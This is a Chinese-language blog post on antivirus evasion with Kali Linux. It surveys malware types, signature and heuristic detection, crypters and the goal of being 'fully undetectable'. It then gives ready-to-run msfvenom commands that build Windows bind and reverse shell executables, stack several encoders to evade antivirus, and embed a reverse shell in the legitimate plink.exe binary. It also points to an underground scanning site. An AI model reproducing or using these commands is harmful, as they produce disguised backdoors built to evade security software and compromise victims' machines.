kali linux之免杀技术

恶意软件:

病毒,木马。蠕虫,键盘记录,僵尸程序,流氓软件,勒索软件,广告程序

在用户非自愿的情况下安装

出于某种恶意的目的:控制,窃取,勒索,偷窥,推送,攻击

 

 

恶意程序最主要的防护手段:杀软

检测原理:基于二进制文件中特征签名的黑名单检测方法;基于行为的分析方法(启发式)

 

 

免杀技术:

修改二进制文件中的特征字符---替换,擦除,修改

 

加密技术(crypter):

通过加密使得特征字符不可读,从而逃避av检测,运行时分片分段的解密执行,注入进程或av不检查的无害文件中

 

防病毒软件的检测:

恶意程序本身的特征字符,加密器crypter的特征字符

 

当前现状:

编写私有RAT软件,避免普遍被av所知的特征字符

使用独有crypter软件加密恶意程序

处事低调,尽量避免被发现,没有能力自己编写恶意代码的黑客,通过直接修改特征码的方式免杀

Fully UnDetectable是最高追求(FUD)

 

AV厂商:

广泛采集样本,尽快发现新出现的恶意程序,更新病毒库

一般新的恶意软件安全UD窗口期是一周左右

与恶意软件制造者永无休止的拉锯战

 

当前现状:

单一的av厂商的病毒库很难达到100%覆盖

接口被某些国家的av软件免费利用,没有自己的病毒库--https://www.virustotal.com

在线多引擎查杀网站与av厂商共享信息---http://www.virscan.org

搞黑产的在线多引擎查毒站---https://nodistribute.com

 

常用RAT软件:

黑暗彗星,潘多拉,NanoCore

 

 

 

自己编写后门:

生成反弹shell

msfvenom -p windows/shell/bind_tcp lhost=192.168.1.12 lport=4444 -a x86 --platform win -f exe -o xxsec.exe

 

 加密编码反弹shell

msfvenom -p windows/shell/bind_tcp lhost=192.168.1.12 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o xx.exe

 

 

加密前后查看可读字符串对比

 

 

 

比较编码前后的检测率

http://www.virscan.org/language/zh-cn/

 

 

 

 

 

 

 

利用模板隐藏shell

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.12 lport=4444 -a x86 --platform win -f exe -o x.exe(未加密编码)

 

 

 

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.12 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > xxx.exe( 加密编码)

 

 

 

 对比

 

 

 

 

 

 

 

软件保护:

软件开发商为保护版权,采用的混淆加密技术避免盗版逆向,常被恶意软件用于免杀目的

 

 

 

友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

posted @ 2019-03-05 00:02  Hydraxx  阅读(3363)  评论(0编辑  收藏  举报